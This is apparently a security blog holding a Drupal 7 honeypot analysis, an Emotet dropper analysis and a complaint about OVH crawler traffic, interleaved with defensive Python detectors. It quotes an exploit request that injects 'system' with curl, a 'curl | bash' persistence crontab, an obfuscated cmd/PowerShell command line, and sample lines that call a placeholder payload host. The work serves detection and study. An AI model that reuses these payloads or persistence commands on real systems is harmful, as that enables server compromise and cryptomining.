We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a JPEG image, which turned out to be a script. The script connects to a Monero mining pool and starts mining crypto from the server automatically. The crafted request injects a system call into a Drupal form render array and uses curl on the server to fetch the payload, as the log below shows.

Here’s all of the traffic from the attacker:

 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"
 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"
 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"


The file logo7.jpg pulled down from the site is a script that runs the miner from /var/tmp/suppoie as www-data on the device:

Created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json. The config.json file has embedded credentials to login to the mining pool under user



A crontab is created to keep the script going:

[email protected] /var/tmp # crontab -u www-data -l
* * * * * curl -s | bash -s
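The request shape and the cron entry above are what a defender can hunt for in their own logs. The following is an added example, not code from the original post: it parses constructed access-log lines modelled on the honeypot entries (the source IP 203.0.113.5 and the payload host payload.example are placeholders, since the post redacts them), URL-decodes each request, and flags Drupal Form API properties (#value, #post_render, #markup) passed as parameters, PHP callables injected next to them, and download tools in the query string. It also checks crontab lines for the curl-piped-to-bash persistence pattern.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on the honeypot entries in the post.
# 203.0.113.5 / 198.51.100.7 are documentation addresses; payload.example is a placeholder host.
ACCESS_LOG = """\
203.0.113.5 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"
203.0.113.5 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://payload.example/logo7.jpg&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"
198.51.100.7 - - [24/Apr/2018:02:05:00 +0000] "GET /node/1 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
"""

# Constructed crontab modelled on the www-data entry in the post (URL is a placeholder).
CRONTAB = """\
* * * * * curl -s http://payload.example/logo7.jpg | bash -s
0 3 * * * /usr/bin/certbot renew --quiet
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Drupal Form API property names never belong in user-supplied parameter names.
RENDER_KEY_RE = re.compile(r"#(post_render|pre_render|markup|lazy_builder|value|type)\b")
# A PHP callable assigned as a render callback is the actual code-execution payload.
CALLABLE_RE = re.compile(r"=(system|exec|shell_exec|passthru|popen|proc_open)\b")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")


def scan_access_log(text):
    """Return one finding per request that carries Drupal render-array injection markers."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m["path"])  # %23 -> '#', %20 -> ' '
        reasons = []
        if RENDER_KEY_RE.search(decoded):
            reasons.append("Form API property (#...) in request parameters")
        if CALLABLE_RE.search(decoded):
            reasons.append("PHP callable injected as render callback")
        if DOWNLOADER_RE.search(decoded):
            reasons.append("download tool in request")
        if reasons:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                "ua": m["ua"], "path": decoded, "reasons": reasons,
            })
    return findings


def suspicious_cron_entries(text):
    """Flag cron lines that fetch a remote resource and pipe it into a shell,
    or that run anything out of a world-writable temp directory."""
    pipe_to_shell = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if pipe_to_shell.search(line) or "/var/tmp/" in line or "/tmp/" in line:
            hits.append(line)
    return hits


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f["ip"], f["status"], "; ".join(f["reasons"]))
    for entry in suspicious_cron_entries(CRONTAB):
        print("cron:", entry)
```

Correlating by source IP is the useful part: the same host appears once blocked (403) on the user/register probe and once succeeding (200) on the user/password vector, so a rule that only alerts on blocked requests would have missed the compromise.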


If you’re interested in doing analysis, I’ve added the code to download all of the files, password to the zip is infected.

Here’s an analysis courtesy of the JoeSandBox tool we often use to analyze Malware on this site.


Feodo Banking Trojan – Dropper Analysis

It all started with an e-mail from NYU: Received: from (MX5.NYU.EDU [])

"From: xxxx xxxx <[email protected]> 
Sent: Monday, April 2, 2018 9:36 AM
To: Infostruction
Subject: ACH Payment Advice
Good Afternoon,
Please double check the payment for April 02, I have attached the WIRE. Invoice 98914 was paid on 04.01.2018. 
I want to make sure we are both on the same page.
Thank you for your business!
xxxxx xxxx"


We analyzed the malicious document this website ( dropped:

SHA-256 f12642b8eb36637abaa85adbd559d056c36e2e013ca8f429236cd1fe0609c56a
File name WIRE-FORM-DA-280819104.doc
17 engines detected this file

File names included WIRE-FORM-DA-280819104.doc, and ACH-FORM-GMU-89664246207.doc. As you may already know, these will change randomly. The doc launched cmd.exe, which launched powershell with an obfuscated script. It drops C:\Users\Public\183480.exe, file connects to, IP (WEDOS-HOSTING CZ), (Online SAS),, and (OVH Hosting, Inc.). Some of these are fallback addresses: if SSL is filtered, it will use the proxy port, then 443, and finally 4143 

Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 ->


These identifiers are a trademark of the Emotet Banking Trojan, aka Feodo Banking Malware, which is known for its evasiveness, as reported in a deep dive by Trend Micro in late 2017.

According to the Feodo Tracker site:

“Feodo (also known as Cridex or Bugat) is a Trojan used to commit ebanking fraud and steal sensitive information from the victim’s computer, such as credit card details or credentials”.

Not surprisingly, 83 C&C Servers for this Trojan are hosted by OVH, a company we’ve recently had run-ins with for our own web security.

Here’s the gnarly cmd.exe command line that was launched, with the PowerShell entirely encoded inside of it. Notice how “comspec”, “runtime” and the other recognisable tokens are broken up with carets and random upper/lower case. In general it’s just trying to evade pattern matching that expects one consistent casing: cmd.exe and PowerShell accept either, but a variation the regex does not anticipate slips through undetected.

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' KILQtKwM EUtzhvFBAwAuznswikbwwPVaP kliPXChmV & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %PwdzSKirbBZnwpN%=RMcNzPtWSjXm&&set %TNPmzoqfKBJtPf%=p&&set %HAhQIKrGiYZZI%=o^w&&set %HIiAtXXuPowqDzz%=pYBbmzjRJlGAD&&set %iSmITuLLKO%=!%TNPmzoqfKBJtPf%!&&set %GilnvkTTZuYRTVd%=mKzPDjtfw&&set %OsRDrSjYFtE%=e^r&&set %VzCrYnrSpDY%=!%HAhQIKrGiYZZI%!&&set %bZTWFfOzSAOv%=s&&set %AJbRqHRXqJJNCIP%=WQicJTbDDXb&&set %obHkNaO%=he&&set %DvIsqYMIjvnM%=ll&&!%iSmITuLLKO%!!%VzCrYnrSpDY%!!%OsRDrSjYFtE%!!%bZTWFfOzSAOv%!!%obHkNaO%!!%DvIsqYMIjvnM%! '([ruNtIMe.iNTEroPSeRViCes.mARsHaL]::([RuNTIme.intERoPsERViCeS.maRsHAl].GeTMeMbERs()[1].namE).InvOke( [rUnTIme.INTeropSErvIcEs.mArsHAL]::SeCuREstrINGtOglobAlallOCANsi( 
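The command line hides the interpreter name as well: each `set %X%=...` fragment stores a couple of letters, and the delayed-expansion references `!%X%!` are concatenated at the end to spell out the word that is actually executed. The following is an added example, not from the original post or from any vendor tooling: it takes the command line quoted above (embedded as a constructed sample, truncated at the same point as in the post), strips the caret escaping, collects the `set` assignments, resolves the reference chain, and then runs a plain keyword match over the normalised text. The indicator list is an assumption for illustration.

```python
import re

# Constructed from the cmd.exe process-creation line quoted in the post (truncated there too).
SAMPLE_CMDLINE = (
    "'C:\\Windows\\System32\\cmd.exe' KILQtKwM EUtzhvFBAwAuznswikbwwPVaP kliPXChmV & "
    "%^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %PwdzSKirbBZnwpN%=RMcNzPtWSjXm"
    "&&set %TNPmzoqfKBJtPf%=p&&set %HAhQIKrGiYZZI%=o^w&&set %HIiAtXXuPowqDzz%=pYBbmzjRJlGAD"
    "&&set %iSmITuLLKO%=!%TNPmzoqfKBJtPf%!&&set %GilnvkTTZuYRTVd%=mKzPDjtfw&&set %OsRDrSjYFtE%=e^r"
    "&&set %VzCrYnrSpDY%=!%HAhQIKrGiYZZI%!&&set %bZTWFfOzSAOv%=s&&set %AJbRqHRXqJJNCIP%=WQicJTbDDXb"
    "&&set %obHkNaO%=he&&set %DvIsqYMIjvnM%=ll&&!%iSmITuLLKO%!!%VzCrYnrSpDY%!!%OsRDrSjYFtE%!"
    "!%bZTWFfOzSAOv%!!%obHkNaO%!!%DvIsqYMIjvnM%! '([ruNtIMe.iNTEroPSeRViCes.mARsHaL]::"
    "([RuNTIme.intERoPsERViCeS.maRsHAl].GeTMeMbERs()[1].namE).InvOke( "
    "[rUnTIme.INTeropSErvIcEs.mArsHAL]::SeCuREstrINGtOglobAlallOCANsi( "
)

# The variable names keep their percent signs: at an interactive prompt an undefined %X% is not
# expanded, so "set %X%=p" literally creates a variable called "%X%", later read back via !%X%!.
SET_RE = re.compile(r"set\s+(%[A-Za-z0-9]+%)=([^&]*)", re.IGNORECASE)
REF_RE = re.compile(r"!(%[A-Za-z0-9]+%)!")
REF_RUN_RE = re.compile(r"(?:!%[A-Za-z0-9]+%!)+")

# Assumed indicator list for illustration; "powershell" only appears after reference resolution.
INDICATORS = ("comspec", "powershell", "runtime.interopservices.marshal",
              "securestringtoglobalallocansi")


def decaret(cmdline):
    """Undo cmd.exe caret escaping: '^x' means a literal 'x' (a literal '^^' is not handled)."""
    return cmdline.replace("^", "")


def parse_set_vars(plain):
    """Collect every 'set %NAME%=value' fragment from the de-careted command line."""
    return {name: value.strip() for name, value in SET_RE.findall(plain)}


def resolve(text, env, depth=0):
    """Expand !%NAME%! references recursively; unknown names are left untouched."""
    if depth > 32:
        raise ValueError("variable reference cycle")

    def expand(m):
        name = m.group(1)
        if name not in env:
            return m.group(0)
        return resolve(env[name], env, depth + 1)

    return REF_RE.sub(expand, text)


def recover_hidden_tokens(cmdline):
    """Return the words assembled from reference runs outside the set statements."""
    plain = decaret(cmdline)
    env = parse_set_vars(plain)
    remainder = SET_RE.sub("", plain)          # drop the assignments, keep the invocation
    return [resolve(run, env) for run in REF_RUN_RE.findall(remainder)]


def indicators(cmdline):
    """Case-fold the de-careted line plus the recovered tokens, then keyword-match."""
    normalized = decaret(cmdline).lower() + " " + " ".join(recover_hidden_tokens(cmdline)).lower()
    return [k for k in INDICATORS if k in normalized]


if __name__ == "__main__":
    print(recover_hidden_tokens(SAMPLE_CMDLINE))   # ['powershell']
    print(indicators(SAMPLE_CMDLINE))
```

The point for detection rules is that a case-insensitive match on the raw process command line still never sees the string “powershell”; the environment-variable assembly has to be resolved (or the child process creation watched) before the interpreter name is visible.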



In some cases, it created this file, possibly to look innocuous:

The file C:\Users\XXXX\AppData\Local\Temp\TCD7340.tmp\Text Sidebar (Annual Report Red and Black design).docx. The file is not signed. The file was created by the script C:\Users\XXXX\Downloads\ACH-FORM-GMU-89664246207.doc after it established a TCP/80 connection to (, located in Louisville CO, United States)


Here’s a full breakdown, courtesy of JoeSandBox




OVH Hosting – Web Security Headache

** Update – 7/10/2018 – The relentless connections have never stopped, not even for a moment. We’ve seen over 398k connections from these hosts, and they don’t realize it’s the same blog page over and over, how intelligent! I’ve updated OVH via an abuse ticket over 50 times with totals and summaries. They have never responded to my inquiries. I’ve never seen action taken on an abuse ticket out of at least 5 opened on various malware, phishing, and other attacks out on the internet.

** Update – 4/6/2018 – We’ve received 125,027 connections from this provider since the blog was posted. A block by ARIN name helps us cover more space, so OVH Hosting, Inc, and OVH SAS are completely blocked from our websites.

Why do Canadians love the Infostruction blog so much? This is a question I set out to answer after looking at our Web Application Firewall (WAF) logs over the past 48 hours, and beyond. I’ve got 60k connections from 39 different IPs that belong to OVH Hosting Inc, all hailing from Canada. I let them know about this issue back when it started and blocked all of the networks owned by this company. Since then, it’s been a constant flood of connections from OVH, and no response from the security/abuse team. I don’t expect one, so I’m writing here to warn you: if you see a large number of connections, we recommend blocking the IPs below at a minimum. The real problem comes with the volume and the fact that they are relentless, never stopping to rest. These connections come 24x7x365 and look like some sort of crawler or scraper. The issue is that they do not present a legitimate user-agent for that kind of bot, so we have no idea why they are accessing all of the content repeatedly, for days on end.

OVH Hosting, please end this relentless assault on our web server. None of it is getting anywhere, and the global CDN/WAF is blocking every connection from these hosts, so they never reach the website’s real systems. It’s just blowing all of the data off my log for other connections I should be looking at instead. Stop wasting my time, and attack something else. You’ve got the idea for inbound attacks, now start protecting the internet FROM your clients, not just your clients from the internet.

Organization: OVH Hosting Inc. (aka OVH SAS)
Geolocation: Canada
Connections: 15,050 (48hr)

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
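A scraper that hides behind a list of browser user-agents gives itself away in exactly the way described above: one source address, a request rate no human produces, the same page over and over, and several different “browsers” claiming to sit on that address. The following is an added example, not the blog’s WAF tooling: it profiles constructed access-log lines (one crawler on the documentation address 203.0.113.41 cycling the user-agents listed above, plus one ordinary visitor) and flags sources that exceed an assumed request rate, rotate more than a couple of user-agents, or hammer a single URL.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The four distinct user-agents listed in the post; the constructed crawler cycles through them.
UAS = [
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def build_sample_log():
    """Constructed sample, not real OVH traffic: 203.0.113.41 requests the same page every 30 s
    while rotating user-agents; 198.51.100.9 is a normal visitor with one browser."""
    start = datetime.strptime("06/Apr/2018:10:00:00 +0000", TS_FMT)
    lines = []
    for i in range(200):
        ts = (start + timedelta(seconds=30 * i)).strftime(TS_FMT)
        lines.append(f'203.0.113.41 - - [{ts}] "GET /blog/ovh-hosting/ HTTP/1.1" 403 0 "-" "{UAS[i % len(UAS)]}"')
    for i in range(3):
        ts = (start + timedelta(minutes=7 * i)).strftime(TS_FMT)
        lines.append(f'198.51.100.9 - - [{ts}] "GET /blog/ HTTP/1.1" 200 5120 "-" "{UAS[2]}"')
    return lines


def profile_sources(lines):
    """Aggregate request count, distinct user-agents, distinct paths and time span per IP."""
    stats = defaultdict(lambda: {"count": 0, "uas": set(), "paths": set(), "first": None, "last": None})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        parts = m["req"].split(" ")
        s = stats[m["ip"]]
        s["count"] += 1
        s["uas"].add(m["ua"])
        s["paths"].add(parts[1] if len(parts) > 1 else m["req"])
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
    return stats


def flag_crawlers(lines, max_per_hour=100, max_uas=2, repeat_threshold=50):
    """Thresholds are assumptions; tune them to your own traffic. Returns {ip: [reasons]}."""
    flagged = {}
    for ip, s in profile_sources(lines).items():
        hours = max((s["last"] - s["first"]).total_seconds() / 3600, 1 / 60)  # floor at 1 minute
        reasons = []
        if s["count"] / hours > max_per_hour:
            reasons.append(f"{s['count']} requests in {hours:.2f} h")
        if len(s["uas"]) > max_uas:
            reasons.append(f"{len(s['uas'])} distinct user-agents from one address")
        if len(s["paths"]) == 1 and s["count"] >= repeat_threshold:
            reasons.append("same URL requested repeatedly")
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in flag_crawlers(build_sample_log()).items():
        print(ip, "->", "; ".join(reasons))
```

Blocking by ARIN organisation, as the update above describes, is the coarse fix; a profile like this is what tells you which sources to escalate in an abuse ticket, with the counts and time spans the ticket should carry.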

IP Addresses: